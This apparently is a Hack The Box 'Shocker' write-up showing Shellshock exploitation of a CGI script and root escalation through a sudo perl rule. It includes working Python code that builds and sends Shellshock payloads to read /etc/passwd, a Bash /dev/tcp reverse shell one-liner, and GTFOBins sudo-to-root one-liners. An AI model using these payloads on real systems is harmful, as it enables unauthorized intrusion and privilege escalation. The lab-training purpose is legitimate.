Introduction

Today I explore Shocker from HTB, an OSCP-like box featuring a web server exploitable via Shellshock (CVE-2014-6271). Once on the box we use a sudo rule for perl to escalate to root. I start each box by running AutoRecon (which I have mentioned several times in other articles). Within the first few seconds I see port 80 is open, so I head over to the website and see a picture of a bug.

Viewing Port 80 shows a picture of a 'bug'.

I try .html and .php extensions on the index page to get an idea of what is running; it is just a static HTML page. Viewing the source I see no useful information or comments. Checking back on my AutoRecon results I see GoBuster has found two hits for /cgi-bin/. That, along with the name of the box, was enough to tell me I was most likely dealing with a Shellshock-exploitable server: Apache's mod_cgi hands request headers to the CGI script as environment variables (the User-Agent header becomes HTTP_USER_AGENT, for example), and an unpatched bash executes whatever command follows a function definition placed in such a variable. I would recommend reading THIS for more information.

I run another GoBuster scan, this time pointed at the cgi-bin directory and looking for .sh extensions.

The flags I use: dir tells GoBuster to brute-force directories and files rather than DNS names or vhosts; -q keeps it quiet so only hits are shown; -t 50 sets 50 concurrent threads, because time is money; -w /usr/share/seclists/Discovery/Web-Content/raft-small-files.txt selects my word-list of choice; and -x .sh appends the .sh extension to every word so it specifically looks for shell scripts. Assembled, with -u pointing at the target's /cgi-bin/ directory, that is: gobuster dir -u http://<target>/cgi-bin/ -q -t 50 -w /usr/share/seclists/Discovery/Web-Content/raft-small-files.txt -x .sh

Using the -x flag to search for .sh (shell) files.

I get a hit and use that script to test for Shellshock by pulling /etc/passwd:

Testing Shellshock by pulling /etc/passwd.

Seeing that it works, I swap the command for a Bash one-liner reverse shell, with a listener waiting on my machine, and get a shell on the box. PenTestMonkey has a great article on this (though web browsers now seem to flag that site, unjustly), so HERE is a link to PayloadsAllTheThings instead. Once on the box I ran sudo -l, which should always be one of the first things to check.
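To make the test and the reverse shell concrete, here is a small Python helper added for this write-up; it is not the post's own command and not anything shipped with HTB or AutoRecon. It shows what the injected header value looks like, why it starts with `echo; echo`, how to recognise a successful /etc/passwd read, and the classic local one-liner check for your own bash. The host, CGI path, attacker IP and port are placeholders you supply; the local check says nothing about the target.

```python
"""Added example (not the post author's code): Shellshock (CVE-2014-6271) helpers.

A bash-backed CGI script receives request headers as environment variables
(Apache exports User-Agent as HTTP_USER_AGENT). Pre-patch bash treated any
environment variable whose value began with "() {" as a function definition
and kept executing whatever followed the closing brace.
"""
import http.client
import os
import re
import shlex
import shutil
import subprocess

# The function-definition prefix; everything after it was executed by unpatched bash.
SHELLSHOCK_PREFIX = "() { :;}; "


def local_bash_vulnerable():
    """Canonical local check: True if this machine's bash runs the trailing
    command from an environment variable, False if patched, None if no bash."""
    if shutil.which("bash") is None:
        return None
    env = dict(os.environ, x=SHELLSHOCK_PREFIX + "echo SHOCKED")
    proc = subprocess.run(["bash", "-c", "echo probe"], env=env,
                          capture_output=True, text=True)
    return "SHOCKED" in proc.stdout


def shellshock_payload(command):
    """Header value that makes the CGI's bash run `command`.

    The two echos emit the blank line that terminates the CGI response headers,
    so the command output lands in the HTTP body instead of Apache answering
    500 'malformed header from script'. shlex.quote keeps the command intact
    inside the quotes handed to bash -c.
    """
    return f"{SHELLSHOCK_PREFIX}echo; echo; /bin/bash -c {shlex.quote(command)}"


def reverse_shell_payload(lhost, lport):
    """Same injection carrying the Bash /dev/tcp reverse shell; start a
    listener such as `nc -lvnp <lport>` on lhost first (placeholders)."""
    return shellshock_payload(f"/bin/bash -i >& /dev/tcp/{lhost}/{lport} 0>&1")


def looks_like_passwd(body):
    """True if the response body contains the root line of an /etc/passwd."""
    return re.search(r"^root:[^:]*:0:0:", body, re.MULTILINE) is not None


def probe_cgi(host, path, command="cat /etc/passwd", header="User-Agent",
              port=80, timeout=10):
    """Send the payload in `header` to the CGI script at `path`; return (status, body)."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path, headers={header: shellshock_payload(command)})
        resp = conn.getresponse()
        return resp.status, resp.read().decode("utf-8", "replace")
    finally:
        conn.close()


if __name__ == "__main__":
    import sys
    # Usage: python3 shellshock.py <host> /cgi-bin/<script>.sh  (both are yours to supply)
    status, body = probe_cgi(sys.argv[1], sys.argv[2])
    verdict = "VULNERABLE" if looks_like_passwd(body) else "not confirmed"
    print(f"HTTP {status}: {verdict}")
    print(body)
```

Any header the server exports to the environment works as the carrier (Referer and Cookie are common alternatives when User-Agent is filtered), and a 500 response with an empty body usually means the command ran but produced no valid CGI headers, which is exactly what the leading echos prevent.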

It showed me that perl could be run as root via sudo without a password. Head over to GTFOBins, grab the sudo one-liner for perl, and root the box.
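As an added example (not the post author's code), here is a small triage script that parses `sudo -l` output and flags entries for which GTFOBins documents a sudo escape to a root shell. The GTFOBins table in it is a hand-picked subset quoted for illustration, and the user and host names in the sample output are made up.

```python
"""Added example (not the post author's code): triage `sudo -l` output and flag
binaries with a documented sudo -> root shell escape."""
import re

# Subset of GTFOBins 'sudo' entries (the one-liners are GTFOBins', quoted here
# for illustration; the real list is far longer, so a miss here proves nothing).
GTFOBINS_SUDO = {
    "perl": "sudo perl -e 'exec \"/bin/sh\";'",
    "python": "sudo python -c 'import os; os.system(\"/bin/sh\")'",
    "python3": "sudo python3 -c 'import os; os.system(\"/bin/sh\")'",
    "find": "sudo find . -exec /bin/sh \\; -quit",
    "vim": "sudo vim -c ':!/bin/sh'",
}

# One Cmnd_Spec line as sudo -l prints it: "(runas) [TAG: ...] command[, command...]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def parse_sudo_l(output):
    """Return one dict per allowed command found after the 'may run the following
    commands' banner: runas user, NOPASSWD flag, the command, and a known escape."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmd").split(", "):
            cmd = cmd.strip()
            name = cmd.split()[0].rsplit("/", 1)[-1]
            # "(ALL) ALL" allows any command, so a root login shell is the direct route.
            escape = "sudo -i" if cmd == "ALL" else GTFOBINS_SUDO.get(name)
            rules.append({"runas": m.group("runas"), "nopasswd": nopasswd,
                          "command": cmd, "escape": escape})
    return rules


def escapes(rules):
    """Only the rules that map to a known root-shell one-liner."""
    return [r for r in rules if r["escape"]]


# Constructed sample of what `sudo -l` prints (user and host names are made up).
SAMPLE_SUDO_L = """\
Matching Defaults entries for user on target:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User user may run the following commands on target:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/id, /usr/bin/whoami
"""

if __name__ == "__main__":
    for r in escapes(parse_sudo_l(SAMPLE_SUDO_L)):
        tag = "no password needed" if r["nopasswd"] else "password required"
        print(f"{r['command']} as {r['runas']} ({tag}): {r['escape']}")
```

The perl one-liner works because sudo starts perl with effective uid 0 and perl's exec replaces that process with /bin/sh, which inherits the uid; nothing about perl itself is special beyond being allowed to run as root.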

Rooting Shocker from HTB with proof.

Rooted

Published On: October 13th, 2020 / Categories: HTB, Technology
